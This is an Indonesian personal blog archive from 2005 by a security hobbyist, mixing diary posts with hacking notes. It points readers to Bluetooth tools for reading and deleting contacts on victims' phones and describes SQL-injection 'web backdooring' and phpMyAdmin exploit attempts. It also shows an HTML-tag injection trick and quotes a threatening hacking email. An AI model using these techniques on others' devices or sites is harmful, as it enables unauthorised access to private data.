Saturday, December 31, 2005

bye bye 2005

0 comments
selamat tinggal 2005, selamat tinggal matrix, selamat tinggal flat inet connection, gw masih belum tau bagaimana gw bisa terkoneksi ke internet secara rutin taun depan .... , maybe this is my last post in this year, n my last post with flat inet connection, so long n good bye all ... c u n next year with next connection .... (hope so ..)

Friday, December 30, 2005

Rafting ....

0 comments


Ini adalah foto sebelum kita (gw dan temen temen angkatan XXVI a.k.a soniX) memulai acara rafting di sungai cianteun, Coba cari gw yang mana ?

Rasanya enak banget euy bisa rafting (arung jeram), acaranya hampir 4 jam lebih (emlewati beberapa jeram) dan sempat mampir liat telapak kaki Mulawarman (bener gak yah?) pokoknya dari kering ke basah ke kering ke basah lagi ... hehehehe, jadi pengen lagi walaupun pergelangan tangan gw keseleo, seru bang..get dech, memacu adrenalin juga :p

Wednesday, December 28, 2005

bluet00th hacking?

1 comments
Taun kemarin tepatnya gw dah ngeriset soal ini (saat hangat-hangatnya di bahas di berbagai hacking conference),dan sampai sebulan kemarin akhirnya bisa juga nge-dial number handphone/telephone A dari pc (attacker machine) via bluetooth (bluejacking technique) ke hp target (handphone X) yang sudah di "compromise", selain bisa liat info device, liat daftar di buku telepon, sama ngedelete entry yang ada di handphone, mudah mudahan bisa jadi materi Workshop untuk di Bandung dan Salatiga (wait for another info) dan juga jadi salah satu chapter di buku yang "rencananya" (as usually, rencana ... hehehe) akan dan sedang gw susun.

Kalo lo mo belajar coba-coba silahkan lo donlod aplikasi "redfang" , "bluesnarfer", sebelum itu donlod dulu bluez-utils dsb dari situs resmi bluez di bluez[dot]org, yang jelas lo kudu punya hp ber-bluetooth (gw pake t68i yang juga gw pake untuk modem via bluetooth juga :p) ,serta usb dongle untuk ke pc atau laptop, mungkin bisa baca di article gw soal koneksi gprs dengan bluetooth (lumayan nambahin pengetahuan).

ini salah satu gambar dari hasil ujicoba, kebetulan ini adalah melihat buku telepon (sengaja di hapus sebagian sebagian ..) dan jangan tertipu dengan nama p900 (its just a name :p)




well, have fun with that :)

Friday, December 23, 2005

Confuse

1 comments
Perhatian : Judulnya bukan nama salah satu ajaran/paham yah :P, tetapi itu kondisi gw saat ini. Terlalu banyak pilihan yang harus gw buat, terus terang sangat berkaitan dengan masa depan gw. Semalem dah cerita panjang lebar sama "adek" tapi adek malah bilang "terserah gimana baiknya menurut abang", nah lo?. Dilain pihak Gw juga masih belum berani kosultasi ma ORTU soal ini, selain gak bisa "tatap muka" karena lokasi dan juga gw takut ortu malah makin khawatir soal gw.

Terus terang gw makin merasa tersisih dari "dunia maya" dikarenakan frekuensi gw buat terhubung ke internet jadi sangat langka (untung masih pake GPRS ampe akhir taun) dikarenakan pekerjaaan yang sekarang tidka memungkinkan untuk terkoneksi secara "often", seiring masuknya ke taun 2006 hal ini akan makin membebani gw (pertama, gw mengira bisa survive, tapi .. this is my world now, the world of electron and switch ... , hal ini benar adanya).

DO i have to choose a new job ? ... some friends offer me some place ,-
maybe i should send much letter to GOD and asking about it ...

Monday, December 19, 2005

My Tecra reborn again

0 comments
Setelah dilakukan "penggantian" Organ tubuhnya (mobo, red) di sebuah toko di wilayah MegaKuningan (Ambasador mall, red) maka tepatnya hari ini gw menjemputnya (my Tecra8100, red) dan sudah dapat beraktifitas kembali, menginggat hardisknya kemaren jadi external harddrive maka gw butuh waktu buat atur kembali space hd untuk "breezy", So welcome back my "Tecra" and lets ROCK the world for the second time. Thx 4jj1 , tim Doctor dans meuanya yang telah bersimpati, hehehhhe

Sunday, December 18, 2005

such n epilogue 4 tday

0 comments
We had a little fight today, thats just becoz some of missunderstanding between us, but the results prove that we are know that we care about each others, today i more n more realize about her attention to me ...

Friday, December 16, 2005

Ngakalin header blog friendster

0 comments
caranya gampang cukup isikan di BLogs > Edit Configuration > Blog Basic >

Blog name:
kosongkan

Blog description/catchphrase: isi dengan
-img src="http:/link/kegambar/elo.jpg" height="200" width="89%" align="right"+

p.s:
- = <
+ = >

cuma masih belum nemuin buat ngilangin foto (belum sempet, abis ngebosenin blognya.. aseli dech)


its a lame, but phun enough,
believe me theres somethin fun from this could u gain :P
liat contohnya langsung aja di tampilan blog gw at frensta
http://y3dips.blogs.friendster.com/my_blog

this info mirrored from :
http://y3dips.blogs.friendster.com/my_blog/2005/12/ngakalin_header.html

Thursday, December 15, 2005

New Joyz

0 comments
Dah dmulai dari beberapa kali piket (kayak sekulahan) akhir akhir ini gw punya "kesenangan" baru yang bisa mengobati kerinduan dengan Internet saat bekerja (nun jauh disana, red)

Apakah itu ?
Yaitu main band ! :), band ? yupe, di sana ada studio musik yang bisa gw manfaatin buat nyalurin kegilaan gw bernyanyi, apa sih yang berubah? kalo biasanya gw beramai ramai (nge-band) tapi sekarang gw main sendiri (maklum gw terpisah dari semua member band gw dulu), kalo dulu gw cuma pegang microphone (santai santai) eh sekarang gw kudu main gitar sambil nyanyi or main bass sambil nyanyi tapi belun bisa main drum sambil nyanyi (keknya ketukan gw gak sinkron deh, gak jelas gitu).

Apa yang gw bawakan saat ini cuma beberapa buah lagu yang masih gw inget "kunci"nya sama cara nyanyinya, diantaranya: Kau seperti kekasihku (lagu pertama ngeband bareng anak anak) , Sobat [padi], CREEP (the first song that made me can play guitar), High n Dry [Radiohead], Anugerah terindah [S07], Dont Cry, November Rain, Sweet Child O mine [GNR], The man Who sold the word [Nirvana], I will Survive [CAKE], Andai [GIGI], Toxicity [SOD], dan beberapa lagu lain secara sepenggal sepenggal (maklum dah banyak lupa), yang jelas gw gak bisa mainin "DREAM THEATER" khususnya album Scenes from my memories yang biasa gw nyanyiin bareng temen temen (i miss to sing that song again, especially "home" :P).


Oleh kerana itu gw berniat belajar buat bis ngebaca Tablature, maklum kalo dulu gw dah ada yang terjemahin alias temen gw yang "ngulik" n kalo gw mo main tinggal terima kunci/chord guitar :P, tapi sekarang kalo gw mo bisa baca tablature ya kudu belajar, so gw abis download artikel how to read tab dari salah satu situs fender (merk komersil gitar), oke doakan gw yah :P

Monday, December 12, 2005

$GLOBALS under attack

0 comments
Dah beberapa hari ini ngeriset bug di phpmyadmin bareng K-159 yang di release di http://www.hardened-php.net/advisory_252005.110.html dan berkaitan dengan masalah register globals yang bisa di overwrite tapi masih belum menemukan titik pastinya :) (baca: belun sukses) eh malah nemuin path dislosures duank, kita yakin sih masih ada variabel yang kurang sehingga dianggap "sent header lagi" pada saat nge-exploit via URL (string exploit yang kita cobakan). Memang sih dah banyak CMS yang jadi korban karena membiarkan variablenya terbuka dikarenakan merasa aman dengan "mematikan" register global (register global=off), serta memberikan "fake" warning yang tenryata masih bisa di akalin.

Ada satu hal yang gw sorotin disaat gw nge-review banyak CMS yaitu kelalaian banyak CMS dalam hal permission file (khususnya konfigurasi file yang bisa dibaca oleh non-user (seharusnya bisa di batasi dengan beberapa teknik (misal password di file konfigurasi dapat di enkripsi) tetapi tetap saja ini membahayakan) dan yang jadi masalah utama lainnya adalah direktori yang bisa di tulisi oleh non-user (miaslakan upload direktori, tmp, dsb) yang akan menjadi awal dari persinggahan :P

JJP s/d JJM

0 comments
Yup, hari ini gw full jalan jalan sendirian, dari jam 11 pagi [abis cetting ma temen temen di IRC] sampe jam 20.30, Pertama gw pergi ke Mall ambasador yang gw sendiri gak tau dimana cuma dapat beberapa arahan dari temen temen, walau arahannya gak jelas dan gak sama gw cobain aja naik 70 dari ragunan trus tanya kernetnya eh disaranin naik P20 trus turun mega kuningan, sampe situ nanya tukang ojek eh katanya 500 meter lagi , jadi deh sekalian di anterin :P

Oh iyah alasan gw ke ambasador adalah dalam rangka "mengantarkan" laptop gw untuk berobat ke dokter lain :p, tujuan awal sih mo cari motherboard yang "used" (supaya minimal bisa bertahan sampe gw ngumpulin duit buat tambahin beli yang baru) eh pas ke salah satu toko eh laptopnya mo di cek dulu koz orangnya optimis bisa betulin (AMIN .... 10 pangkat n) .. jadi nunggu 2 hair lagi buat tanya kabarnya ..

After that gw berniat balik tetapi karena gw masih belum nonton Harry potter & The Goblet Of fire maka gw langsung saja ke 21, karena filmnya jam 4 gw nongkrong dulu di Gramedia dan ada hal menarik gw liat, "ada cewe (anak smu) baca buku hack ampe lebih kurang 1 jam, soalnya gw juga nungguin buku itu juga (maklum suka baca gratis) ampe bolak balik dan senyam senyum .. heheh, cewe gitch loch baca buku hacking ? serius banget lagi , hebat hebat .."

Tibalah waktunya menonton Harry Potter, kesan yang di dapat kok filmnya gak sedahsyat bukunya yah :(, ternyata bener bahwa dengan membaca imajinasi akan lebih bermain, yang jelas Cho chang (tidak secantik yang di bayangkan dan di ceritakan di Bukunya :( , begitu pula cedric, victor krum) , tapi Hermione cakep banget pake gaun dansa...

Dan setelah makan akhirnya pulang trus laporan (telpon) ama "adek" (sebenernya mo bikin iri aja .. , abis gak pernah sempet sih diajakin nonton :P)

Thursday, December 08, 2005

Cape

0 comments
Abis ujian 2 mata kuliah tadi dan mohon jangan tanya hasilnya :P, tetapi buat ornag yang gak pernah masuk mudah mudahan gak mengecewakan (untuk grafik komputer dan pengolahan citra sih keknya lumayan, untuk 4th generation language ini yang nyebelin informix ama isql , /me bawaannya mysql aja buat QUERY :P)

btw hari ini gw bagusin launchpad gw :p sama buatin untuk Ubuntu indonesia (gw dah jarang aktif) so you better cek this out
https://launchpad.net/people/ammar
https://launchpad.net/people/ubuntu-id

sama ngetes blog di fs :P aseli gak nyaman bgt ma tampilannya (ini dah maksimal di ubek ubek :()
http://y3dips.blogs.friendster.com/my_blog/ <-- jangan di ketawain yah :p

Wednesday, December 07, 2005

Ujian Hari kedua

0 comments
Bingung .... hari ini ujian dua mata kuliah yaitu Pemrograman Generasi Ke empat dan Pengantar Grafik dan pengolahan Citra. Nah terus yang bikin bingung adalah gw kudu belajar apaan buat ujian wong bahan gak ada, jangankan bahan wong dosennya itu cewe apa cowo aja gw gak tau (namanya juga gak tau) wong gw gak pernah masuk ... hiks hiks .... mudha mudahan ibu gak tau ( kan dia gak baca blog, maaf ya mum ), Daripada bingung mending gw cetting sama nulis blog aja (nah lo !!) heuehuehuehe

Tuesday, December 06, 2005

1 - 1 ( yahoo - y3dips )

0 comments



yahoo boleh aja nge-lock id "y3d1ps" seminggu yang lalu (till now) tapi gw juga berhasil reveal id "y3dips" yang gw buat 2002 dan sudah pernah di lock yahoo sampai akhirnya gw menyerah dan membuat id "y3d1ps".

hehehe, jadinya seri deh kedudukan kita ;) . PEACE man !

Sunday, December 04, 2005

Desember ?

0 comments
Met akhir taun (Desember, red), Gak tau deh mo jadi apa gw bulan ini , alhasil bulan kemaren semua 'skedule' gagal dikarenakan laptop yang mandek [masih], draft buku yang mo gw tulis berformat txt musnah (padahal dah 1 bab + draft isi), semua CMS yang gw donlod amburadul letaknya, yang jelas semua yang mo gw kerjakan jadi "stop". ALhasil awal bulan ini gw gak ngerjain apa apa, cuma menikmati internet yang tinggal ampe akhir 2005 ini, main FM 2006, trus nonton VCD "hero" 16 episode (total 20).. parah .. parah.

Ada lagi yang aneh, otak gw kok kalo nongkrong depan PC (junk server) tuh bawaaanya cuma mo online aja, atawa nonton tipi, paling banter mainin GIMP, itu duank! Ada perasaan gak nyaman buat kerja di PC [heran gw, apa gw dah kecanduan laptop??].

Tapi syukur deh, pagi ini gw paksain juga otak gw bekerja, gw riset salah satu advisories yang kebetulan di infoin oleh kang roni [a.k.a K-159] beberapa waktu yang lalu (bulan lalu sih tepatnya, dah mau risetnya dah dari dulu :( ) yang ngegunain teknik bagus buat manfaatin SQL untuk melakukan web backdooring, yang akhirnya kita sampai pada satu kesimpulan yaitu kemungkinan besar semua bug lawas yang mengandung "sql inject" maka dapat di manfaatin untuk web backdooring (tentu saja dengan kondisi kondisi tertentu), Tadi juga sempet POC di berbagai kondisi dari yang Vulnerable sampe yang inVulnerable, serta ngebahas soal user "mysql" di system yang bisa dimanfaatin sebagai zombie untuk mengakses system sampai ke user dari mysql itu sendiri (bahkan kang roni nemuin kalo ada yang buat web dataase usernya itu root ... holy sh** , adminnya makan gaji buta duank kali ye :P) .. jadi hari ini adalah "MYsql day" for me ... [minimal dah ngebuat otak gw bekerja]

Balik lagi ke masalah laptop, sekarang gw kayaknya mo cari motehrboard pengganti duluw, soalnya dapet info kalo mobo yang used (2nd) itu harganya masih kejangkau sekitar 200 U$ dollar gitchu deh, dibanding gw beli baru kan duitnya belun cukup .. hehehe kalo laptopnya dah nyala baru cari duit lagi dengan laptopnya tuk dapatin yang baru, amin

Btw, sekalian gak nyambung dan sekedar info .... Besok (2 minggu kedepan) gw MID Semester .. hisk hiks , apa yang musti gw jawab yah :( , Doakan aku yah

Gak jadi nonton HP :(

0 comments
Dah semangat banget hari ini mo nonton Harry Potter and the goblet of fire (dah nungguin dari dia terbit di JKT :( ) eh gak taunya baru aja 10 meter lagi menuju pintu cineplex 21th, dah keliatan barisan yang ngantri buat beli tiket(ampe depan pintu masuk.. jadi inget pas nonton AADC di PondokIndah, untung ada sepupu yang ngantriin :) :P) , (wekz) padahal nih film seinget gw dah di puter hampir kurang lebih 2 minggu yang lalu tetapi kok masih aja rame :( (Sadis) , daripada ngantri mending gw batalin deh acara nonton mudah mudahan minggu depan dah sepi dan bisa bareng ama adek :P (tadi berangkat sendirian abis "adek" lagi sakit dan gak bisa ikut .. karena dia merasa gak enak akhirnya diijinin gw nonton sendiri).... nunggu lagi dech :( [!ingat jangan nonton bajakan :p]

Saturday, December 03, 2005

Come on and kick me !

2 comments
Setelah 2 hari ke jaman batu (dines jauhh , red), akhirnya dengan semangat 45 maka pas balik lagi langsung nyalain GAIM (auto login), eh malah dapet peringatan dari yahoo:



pas coba login dan gagal terus cobain recover password eh malah dapet pemberitahuan :



Kok yahoo jadi sentimen yah , hehehe (apa karena gw nulis di blog soal cinta segi empat antara yahoo, norton,virus dan spam :P) , yang jelas emang di geocities banyak "barang berguna" :p, jadi nyusul the_Day2000 deh :P, btw jadi inget kata az001 "dips, kalo gak mau di Buzz dan diganguin orang terus walau elo invinsible, lo mending ganti id aja :P" ... heheheh kalo gini kan gw gak perlu repot repot buat nutup account (sial),.... terpaksa gunain id lama, tapi kok 360 gw gak di tutup ma yahoo yah ;) .. yahoo yang aneh :P

Friday, November 25, 2005

inalillahi wainna ilaihi roji`un

2 comments
Telah berpulang ke alamnya, Laptop Kesayangan gw pada hari selasa tanggal 22 November 2005, setelah divonis oleh tim dokter (service center toshiba :P) akibat mengidap kangker akut pada VGA card (onboard) komplikasi dengan lever pada Memory, Tim dokter telah berhasil menyembuhkan penyakit lever pada memory tetapi tidak dapat berbuat banyak pada Kangker di VGA, oleh karena itu tim dokter menyarankan untuk mencari donor VGA baru yang dalam hal ini mengganti keseluruhan tubuh bagian dalam (motherboard) dan akan menghabiskan biaya yang kurang lebih akan sama dengan penggantian baru (laptop).

Setelah berfikir berkali-kali, menimbang sana sini, akhirnya gw putuskan untuk mengistirahatkan (mengebumikan) dengan terlebih dahulu mengambil bagian tubuhnya yang masih aktif untuk di sumbangkan, saat ini baru hardisknya yang gw beliin "casing" agar bisa dikoneksikan via USB (menjadi flsahdisk ukurna 12 GB :P, maksudnya jadi HD eksternal) , selain itu ada CDrom, batere dan RAM 128 MB sebanyak 2 keping yang belum tau akan di kemanakan :)

Gw sadari jasa jasanya selama lebih kurang 3 tahun ini sangat berarti, lebih banyak "uang" dihasilkan daripada biaya yang aku keluarkan untuk membelinya (mungkin 5 x lipat , or more?) dah menemani saat aku sedih, dan gembira, dah menemani pulang kampung (palembang), Seminar (jogja, semarang, cilegon, dsb), menemani tugas kantor (Sleman). Pokoknya semoga amal amalnya selalu dapat memberikan semangat buat gw, amin

Kapan yah bisa beli baru ? ada yang mo nyumbang ?

Tuesday, November 22, 2005

adek-nux ver rc 1.0

4 comments
Akhirnya kesampean juga buat bikin distro :), tepatnya hari ini dari pagi ampe sore baru kelar adek-nux_rc_01.iso, sebenernya dulu dha pernah buat waktu era knoppix awal awal cuma gak ada yang special , tapi kalo sekarang agaknya dha mulai mo serius (walau nantinya emang di tujukan untuk private use) , base-nya sih dari Hoary Hedgehog (ubuntu 5.04) , dengan packet binary dari breezy Badger (ubuntu 5.10)

Sedikit bocoran, yang jelas aku hilangkan openoffice (koz aku gak suka ngetik, bawaan jadi inget ngantor :P), evolution (better use pine or thunderbird for GUI), fetchmail, cupsys, anacron, cron, atd and else, sedang untuk tambahannya sih ada nmap, amap, sleuthkit, john the ripper, ethereal, metasploit, dsb :P untuk multimedia pasti deh ada xmms, mplayer, xine. Dan mengenai nama itu dikarenakan Desktop backgroundnya gambar adek, hehehhe (jadi beneran private kan :P)

Sekarang Break duluw, kalo off (libur kerja) baru sambung lagi..

Friday, November 18, 2005

Most Wanted Movie

0 comments

Setelah balik dari bogor kemaren kemaren (lebih dari 1 hari), gw ngeliat di Citoz terpampang Gambar iklan film Harry Potter n The Goblet Of Fire yang ternyata di putar di dua studio sekaligus, ckckckck, n ada juga film belahan hati yang pengen di tonton "adek" (yang maen Dain satro, Nirina, Marcela, dkk euy :) ). Kapan yah bisa nonton ? , mana adek lagi Ujian Midtest, marah gak yah kalo aku tinggal nonton duluan :P

War ?

1 comments
Disaat kami sedang gencar-gencarnya menghembuskan "Aura Persatuan" yang di tandai dengan buka bersama komunitas echo dan dilanjutkan dengan beberapa pertemuan rutin (soon), eh ada aja orang yang gak ada kerjaan yang ngirim email bercontent gak jelas dengan maksud menimbulkan perpecahan, sebelumnya gw bukan mengeskpos ini dengan "tanpa tujuan" tetapi dengan harapan agar semua komunitas jangan cepat terpancing dengan "produk SMTP" seperti ini, dan semoga setiap komunitas dapat mencermati semua masalah, karena hal ini dapat terjadi pada komunitas manapun ("celah di adu domba"), jadi Waspadalah ! waspadalah !

Kebetulan juga, gw sudah membina hubungan baik dengan komunitas yang "di klaim" oleh pengirim sebagai komunitas miliknya, sehingga mudah saja untuk melakukan "cross check" atau konfirmasi (semoga komunitas lain juga dapat melakukan cek terlebih dulu sebelum di adu domba), setelah menerima email ini maka gw langsung konfirmasi ke "salah satu" staff #minangcrew dalam hal ini phatygeni dan founder lintau.com dalam hal ini "orion" (dan keduanya gw kenal baik) dengan harapan tidak terjadi salah paham (kita sadar kita sama sama percaya ini bukan dari kedua pihak, tetapi untuk mencegah hal hal yang tidak diinginkan terjadi maka perlu di konfirmasi bersama), berikut petikan emailnya :

--- Ha rinto wrote:

> Maaf lahir dan batin juga Mar, terimakasih yg telah
> ngirim email ini kepada kami. Saya terus terang aja
> kaget, Kami dari segenap MinangCrew tidak kenal tuh
> dengan orang yg namanya datuak, Suer...! Lagian
> kami tidak pernah menantang apalagi cari musuh.
> Anggota MinangCrew yg senior adalah : reVn,
> Jangkr|k, Jejeng, Bede`, phatygeni (saya sendiri),
> Vebry, K3lana, ronkodonk, cahcephoe, degleng,
> schizoprenic. Saya aja dengan anggota MinangCrew
> skrg banyak yg gak kenal, karena kami sudah jarang
> main2 di IRC. Jadi dengan demikian dapat di ambil
> kesimpulan, kemungkinan ini ada pihak tertentu yg
> mau mengadu domba dll..
> Kami harap, ini sebagai pelajaran bagi kita
> semua..
>
> Salam Damai
> Regard's
>
> "-[y3dips]-" wrote: --- h2ck3r
> datuak wrote:
>
> > From: "h2ck3r datuak"
> > To: echostaff@echo.or.id
> > Subject: perang yooooooooook
> > Date: Thu, 17 Nov 2005 13:36:46 GMT
> >
>
> > ---------------------------------
> > hallo orang2 echo.or.id apa memang mampu
> menandingi
> hackerminang
> > #minangcrew? beberapa hari lagi kami bisa log ke
> cpaneldan file tmp
> > kalian. jangan hanya gede omong, buktikan
> kalokalian
> bisa menandingi kami.
> > orang minang saja sudah banyakbikin web online
> kayak
> lintau.com,
> > rantaunet.com . berani terimatantangan untuk
> menghack website 2 orang
> > minang? siapa takut?mereka tu hago2 loh!
>
>
> > eprut, tuuut, prut.
>
> > ambo datuak batuah.
>

> ----------------------
>
> salam,
>
> meskipun kami tidak mungkin menanggapi serius mail
> ini, tetapi kami rasa hal ini bisa di jadikan acuan
> untuk kita agar "mawas diri" bersama, dalam artian
> pasti "fake-mail" sejenis yang beralamatkan email
> echo
> ataupun orang lain juga bisa saja menyebar secara
> bebas dan dengan content yang bermacam macam :)...
>
> oh iya lupa " maaf lahir bathin" :P
>
>
>
> salam,
> ------
> IO::y3dips->new(http://y3dips.echo.or.id);


So? hello spammer you fail ?
kami sudah berteman sebelum kamu hadir di dunia maya ini :P

Thursday, November 17, 2005

Quanta on Gnome

0 comments
also posted at http://ubuntulinux.or.id/blog/?p=12

Sebagai Informasi, bagi temen temen (web master, web programmer, web designer , dsb) yang dulunya pemakai setia Quanta(yang running defaultnya di KDE), maka sekarang sudah dapat menikmatinya di Ubuntu yang Desktop Environtmentnya adalah Gnome.
$sudo apt-get install quanta
Nah, sekarang temen temen semua dah bisa bebas berkreasi menggunakan dual view (HTMLview dan Preview) yang dulunya belum di support oleh Screem atau NVU.

Wednesday, November 16, 2005

GPRS via Breezy

0 comments
Hum, Kemarin aku gak mau install Badger di PC (baca: junk server) karena aku gak berhasil lakukan koneksi via bluetooth + gprs matrix (yang dah tewas) + SE t68i, jadinya di junk server aku tetap aja menggunakan hoary (ubuntu 5.04) , eh karena waktu itu aku melakukan apt-get secara local ke CDROM badger dan ketika selesai update beberapa aplikasi (GimP, openoffice, Firefox, gnome ...), selesai update tidak terjadi apa apa, begitu booting lagi Xservernya crash, karena masih bego dan terlalu males buat trace satu satu maka jadilah hoary aku update full ke breezy dengan harap harap cemas mengenai koneksi iNet via GPRS ;P,

Eh hari ini balik dari persembunyian nun jauh disono (negeri antah berantah) aku sempatkan mencoba ulang sampai per-step aku lakukan dari "hcitool scan" sampai "ppd call gprs" (terlebih dahulu menonaktifkan eth0 , sebelum aku insatll firewall utnuk atur routing, dan untuk set default koneksi), eh malah berhasil dan aku cuma mo infoin temen temen bahwa ternyata breezy tidak "cacat" seperti yang kukira (disamping aku memuji kinerja ALSA yang sekarang untuk di TECRA 8100 aku (lagi koma sekarang)).

Maju terus Badger :P

Sunday, November 13, 2005

Antara Spam & NortonYahoo !

3 comments
Well,
bukannya gak pernah dapet beginian tetapi kasus ini agak special, koz yang bakal dijadiin "tertuduh" itu sto`, mungkin kalo pengirimnya orang yang gak di kenal dan bernama "aneh" pasti langsung ke /dev/null walaupun gw dah hapal banget dengan Subject-nya "RE:Failure" itu pasti "email gak jelas", tapi bagi orang orang yang mendapat email yang sama pasti akan merasa tertipu dan berniat membukanya, menginggat nama "sto" sebagai pengirimnya :p, Dan karena penasaran akhirnya gw buka aja, satu lagi gw dapet email dari "bugtraq@securityfocus.com" dan ternyata fake juga :P (Dan gw yakin email gw juga pasti dah sering di "fake" oleh "empunya" atau kepanjangan tangan si virus)

Sebenernya bukan masalah pemalsuan nama pengirim yang mo gw bahas (koz masalah ini dah menjadi dilema dari dulu), tetapi tidakkah anda melihat tulisan yang terpampang di sudut kanan atas file attachment, Attachment scanning provided by: norton ANTIVIRUS 2005, Hum apa yang terjadi ? Apakah virusnya terlalu canggih ? Atau Norton Tidak mampu berbuat banyak (so dont use norton :lol: ), Atau Karena Yahoo masih pake yang 2005? (menginggat bajakannya saja sudah ada yang 2006 (CMIIW) :lol: , i dont use AV), Atau memang yahoo tidak melakukan Scanning ? tidakkah seharusnya tulisannya di rubah menjadi "Virus are supported by: norton ANTIVIRUS 2005" , hehehehhe

Bagaimanapun juga gw dah persiapin dengan AntiVirus untuk $Ms File System Sesungguhnya yaitu "linux" sehingga kalo di buka file yang bernama "detail.txt pif" tidak tau harus berbuat apa di lingkungan berbeda :p

Saturday, November 12, 2005

whats up ?

1 comments
Akhirnya bisa nulis blog lagi via web, ternyata kudu contacting server blogger n itu kudu dari firefox (kebetulan sebelun ini gw pake opera) , eh sekarang malah chatter box-nya di tutup euy ama yang punya, mungkin dah gak punya modal lagi kali yah buat ngasih space gratis :P
Hari ini sebenernya mo cari RAM ke Ratu plaza tetapi gak jadi deh, malah jadinya jalan jalan ma adex, hehehe ...

Friday, November 11, 2005

tes from mail !

0 comments

Gak tau kenapa gw gak bisa posting body message via blogger dan
kejadiannya dah hampir 2 hari , so gw gak bisa posting isi, bisanya cuma
judul aja kayak soal CFP itu, apa yang terjadi yah ??

Karena gw pernah liat fasilitas ini so gw coba aja via emial sebelum gw
kirim via pockeTBlogger dari PDA :)

-----
salam,
y3dips

http://echo.or.id
'belajar && mencoba bersama kami'

Thursday, November 10, 2005

CFP issue #13

0 comments
Hail Hackerz !!!!

"Mohon Maaf Lahir Bathin"

Kami segenap echo|staff mengucapkan Selamat Hari Raya Idul Fitri 1426 H ,
dan meminta maaf setulus tulusnya atas semua kekhilafan yang kami perbuat;

Dengan Mengusung Semangat Hari pahlawan, maka kami, echo|staff, yang sedang
mempersiapkan echo|zine, Vol 4 Issue 13 mengajak
Anda semua untuk dapat berpartisipasi dengan mengirimkan artikel seputar:

* hacking
* security
* phreaking
* forensics
* carding
* electronics
* cryptography
* local underground news

Panduan menulis artikel dapat dibaca kembali pada echo|zine, Vol 3 Issue 11


Para kontributor dihimbau untuk mengirimkan artikel sedini mungkin untuk
menghindari konflik pemilihan topik dan memudahkan editor memandu dan
mengoreksi artikel. Selain itu, artikel yang dikirimkan diharapkan bukan
merupakan artikel terjemahan/saduran dan belum pernah dimuat di media lain.

Usulan artikel harus dikirimkan ke ezine@echo.or.id
================

Important dates:
* submission deadline ................................... 20 Desember 2005
* author release ........................................ 25 Desember 2005
* public release ........................................ 01 Januari 2006


Salam,

anonymous
echo|zine editor-in-chief

Thursday, November 03, 2005

Maafin gw;

0 comments
Gw akui bahwa pasti pernah gw berbuat salah , selaku manusia biasa yang pastinya gw tak akan selalu putih, tetapi gw berharap kesalahan gw yang gw lakuin secara sengaja dan tidak sengaja di hari hari terdahulu dapat temen temen maafkan, adapun kesalahan temen temen semua dah gw maafin dari jauh jauh hari kok ;).

Sekalian gw mo ngucapin Selamat Hari Raya Idul Fitri untuk yang merayakannya, semoga kita dapat menjadi "suci" kembali .. amin.

from palembang with love : y3dips

Monday, October 31, 2005

Mudik Time

0 comments
Hari ini gw akan menuju Palembang (kampung halaman tercinta) dan InsyaAllah sampai tgl 7 November di Palembang, laptop bermemori 128pun terpaksa di bawa untuk menemani, gw dah bawa bekal sih :p, 1 buah CMS phpwebsite untuk di oprek dan dicari kekuatannya (bug :P) , 2 buah potongan artikel yang aku rasa bakalan keren banget :) , artikel pertama di tulis oleh Fyodor yang berjudul "Return on Investment yang merupakan salah satu chapter dari "best-seller Stealing the Network: How to Own a Continent." , 1 buah lagi merupakan karya dari Brian HAtch yang juga merupakan kontributor nmap yang juga dirilis sebagai sekuelnya dengan title " Syngress Stealing the Network: How to Own an Identity.

Rencananya sih sekalian mo kerjain java tapi ternyata mo donlod jsdk-nya ampe jam segini (padahal dah mo bernagkat) tapi belun kelar ..
y3dips@heaven:~$ sudo apt-get install j2sdk1.4
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
j2re1.4 java-common libc6 libc6-dev libc6-i686 linux-kernel-headers locales
Suggested packages:
mozilla-browser j2sdk1.4-doc equivs glibc-doc manpages-dev
Recommended packages:
gsfonts-x11
The following NEW packages will be installed:
j2re1.4 j2sdk1.4 java-common
The following packages will be upgraded:
libc6 libc6-dev libc6-i686 linux-kernel-headers locales
5 upgraded, 3 newly installed, 0 to remove and 908 not upgraded.
Need to get 26.1MB/39.1MB of archives.
After unpacking 70.7MB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com breezy/multiverse j2re1.4 1.4.2.02-1ubuntu3 [22.5MB]
Err http://archive.ubuntu.com breezy/multiverse j2re1.4 1.4.2.02-1ubuntu3
Connection timed out [IP: 82.211.81.151 80]
Get:2 http://archive.ubuntu.com breezy/multiverse j2sdk1.4 1.4.2.02-1ubuntu3 [3545kB]
7% [2 j2sdk1.4 2012915/3545kB 56%]
Kayaknya gak jadi deh bawa java :P (syukur syukur bisa memulai nulis buku , hiks hiks .. )

OK guyz, im heading to west .. goin back to my parent home :lol: , keep everything "hot" till i get back here :P

Sunday, October 30, 2005

My Badger

0 comments
Akhirnya setelah hampir 1 mingguan gw donlod Ubuntu 5.10 via GPRS matrix yang hampir gak bisa gw manfatin lagi mulai bulan bulan ke depan ( baca juga matrix-is-finish ) , akhirnya gw mencoba menginstall Breezy Badger ke laptop gw yang sudah turun kelas ( toshiba tecra 8100, p 3, 600 MHz, ram 128 ; baca juga laptopku-sayang ) dan ternyata masih cukup baik berjalannya (/swap 1GB :P)

Tetapi gw menemukan masalah baru , yaitu menjalankan pppd untuk melakukan koneksi GPRS matrix via bluetooth menggunakan bluez ,semua settingan seperti di artikel Internet via GPRS dan bluetooth atau sama persis seperti setingan di hoary, semua berjalan sempurna, saat pengeksekusian ./gprs script pun semua berjalan sempurna tetapi tidak dilanjutkan pengeksekusian "pppd call gprs" , begitu di lihat lognya di "messages" terdapat info " dev_fs_mkdev: could not append to parent for bluetooth/rfcomm/0 " yang menurut analisa gw sih kemungkinan masalahnya di bluez dan kernel 2.6.12 nya , cuma ya belun tau lah soalnya belun teliti lebih lanjut , temen temen ada yang tau ?

vol IV - issue #13

0 comments
.:. mana nih yang ke 13 ... payah nih echo staff di undur-undur mulu ..
.:. issue 13 kapan keluar ?
.:. ezine dah mati yah ?
[dan beberapa pertanyaan lainnya yang kurang lebih bernada sama]
Karena banyaknya pertanyaan tentang issue 13 echo zine maka dengan sengaja gw buat sedikit penjelasan tentang issue 13 ini di blog gw, dengan tujuan bagi temen temen yang ngebaca dapat memakluminya , ini salah satu jawaban yang gw harap dapat menjawab pertanyaan temen temen semua
baca dunk info di rilis terakhir *_^

"Informasi tambahan, mulai issue 12 echo zine akan diterbikan 4 bulan
sekali untuk memberikan cukup waktu bagi kontributor mempersiapkan
